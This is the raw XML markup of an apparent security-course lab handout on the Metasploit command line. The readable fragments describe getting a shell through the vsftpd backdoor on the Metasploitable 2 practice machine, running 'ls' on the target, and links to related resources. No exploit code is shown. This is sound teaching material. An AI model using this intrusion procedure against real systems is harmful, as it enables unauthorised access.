        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>results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shown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Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.13.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>After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command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(i.e.,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backdoor)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>established,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you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run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>“ls”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targeting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>system.</w:t>
      </w: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64.255997pt;margin-top:8.724404pt;width:475.2pt;height:4pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15709184;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="1285,174" coordsize="9504,80">
            <v:rect style="position:absolute;left:1285;top:174;width:1674;height:80" filled="true" fillcolor="#000000" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:line style="position:absolute" from="1285,179" to="10789,179" stroked="true" strokeweight=".498pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="588" w:val="left" w:leader="none"/>
          <w:tab w:pos="589" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="149" w:after="0"/>
        <w:ind w:left="588" w:right="0" w:hanging="404"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Related</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Information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Resource</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:74.980003pt;margin-top:15.458235pt;width:453.8pt;height:35.9pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15708672;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#e5e5e5" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="215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Metasploitable</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-12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2:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-1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https://docs.rapid7.com/metasploit/metasploitable-2/</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="239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Metasploit:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-11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https://</w:t>
                  </w:r>
                  <w:hyperlink r:id="rId28">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun"/>
                        <w:w w:val="105"/>
                      </w:rPr>
                      <w:t>www.metasploit.com/</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="248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  <w:w w:val="105"/>
                    </w:rPr>
                    <w:t>Metasploit</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-9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Usage</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-9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Examples:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-9"/>
                      <w:w w:val="105"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:w w:val="105"/>
                    </w:rPr>
                    <w:t>https://linuxhint.com/metasploit_usage_examples/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header="253" w:footer="0" w:top="1840" w:bottom="280" w:left="1100" w:right="106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ind w:left="1697"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4145280" cy="3568827"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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b/>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>CS-CNS-20010.13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>example:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>vsftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:header="253" w:footer="0" w:top="1840" w:bottom="280" w:left="110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imSun">
    <w:altName w:val="SimSun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05824" from="11.104pt,23.092pt" to="11.104pt,5.159pt" stroked="true" strokeweight=".249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205312" from="592.609009pt,23.092pt" to="592.609009pt,5.159pt" stroked="true" strokeweight=".249pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:rect style="position:absolute;margin-left:0.0pt;margin-top:30.813499pt;width:3.01pt;height:.249pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-16204800" filled="true" fillcolor="#000000" stroked="false">
          <v:fill type="solid"/>
          <w10:wrap type="none"/>
        </v:rect>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:rect style="position:absolute;margin-left:600.703979pt;margin-top:30.813499pt;width:11.296021pt;height:.249pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-16204288" filled="true" fillcolor="#000000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203776" from="11.104pt,30.564pt" to="11.104pt,12.631pt" stroked="true" strokeweight=".249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203264" from="592.609009pt,30.564pt" to="592.609009pt,12.631pt" stroked="true" strokeweight=".249pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:rect style="position:absolute;margin-left:0.0pt;margin-top:38.2855pt;width:3.01pt;height:.249pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-16202752" filled="true" fillcolor="#000000" stroked="false">
          <v:fill type="solid"/>
          <w10:wrap type="none"/>
        </v:rect>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:rect style="position:absolute;margin-left:600.703979pt;margin-top:38.2855pt;width:11.296021pt;height:.249pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-16202240" filled="true" fillcolor="#000000" stroked="false">
          <v:fill type="solid"/>
          <w10:wrap type="none"/>
        </v:rect>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:66.820999pt;margin-top:77.319077pt;width:275.9pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-16201728" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:before="60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w w:val="95"/>
                    <w:sz w:val="20"/>
                  </w:rPr>
                  <w:t>CS-CNS-20010</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:i/>
                    <w:spacing w:val="19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–</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:i/>
                    <w:spacing w:val="-5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Network</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:i/>
                    <w:spacing w:val="19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and</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:i/>
                    <w:spacing w:val="19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Security</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:i/>
                    <w:spacing w:val="19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Tool:</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:i/>
                    <w:spacing w:val="38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Metasploit</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:i/>
                    <w:spacing w:val="20"/>
                    <w:w w:val="95"/>
                    <w:sz w:val="20"/>
                  </w:rPr>
                  <w:t> </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:i/>
                    <w:w w:val="95"/>
                    <w:sz w:val="20"/>
                  </w:rPr>
                  <w:t>(CLI)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494019pt;margin-top:77.299149pt;width:16pt;height:16.1500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-16201216" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:pStyle w:val="BodyText"/>
                  <w:spacing w:before="6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503" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
        <w:w w:val="11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8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4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4" w:hanging="2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88" w:hanging="404"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
        <w:b/>
        <w:bCs/>
        <w:w w:val="11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562"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
        <w:b/>
        <w:bCs/>
        <w:spacing w:val="-1"/>
        <w:w w:val="10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5" w:hanging="700"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
        <w:b/>
        <w:bCs/>
        <w:w w:val="11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457"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:i/>
        <w:iCs/>
        <w:w w:val="142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4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5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7" w:hanging="45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97" w:hanging="457"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:i/>
        <w:iCs/>
        <w:w w:val="14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4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4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4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2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4" w:hanging="4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66" w:hanging="71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66" w:hanging="718"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
        <w:w w:val="91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82" w:hanging="917"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
        <w:w w:val="98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2" w:hanging="9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3" w:hanging="9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4" w:hanging="9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5" w:hanging="9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6" w:hanging="9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7" w:hanging="91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416" w:hanging="9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16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16" w:hanging="917"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
        <w:w w:val="112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9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9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9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6" w:hanging="9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2" w:hanging="9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917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2"/>
      <w:ind w:left="185"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs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8"/>
      <w:ind w:left="782"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs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7"/>
      <w:ind w:left="2416" w:hanging="917"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs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8"/>
      <w:ind w:left="1500"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial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9"/>
      <w:ind w:left="588" w:hanging="404"/>
      <w:outlineLvl w:val="1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46" w:hanging="562"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia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85"/>
      <w:outlineLvl w:val="3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4"/>
      <w:ind w:left="185" w:right="387"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia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5" w:hanging="70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200" w:lineRule="exact"/>
      <w:jc w:val="right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yperlink" Target="mailto:Dijiang.Huang@asu.edu" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="head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hyperlink" Target="http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://osvdb.org/73573" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.metasploit.com/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.pn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2023-01-03T21:38:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-03T21:38:34Z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2020-11-05T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>TeX</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2023-01-03T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>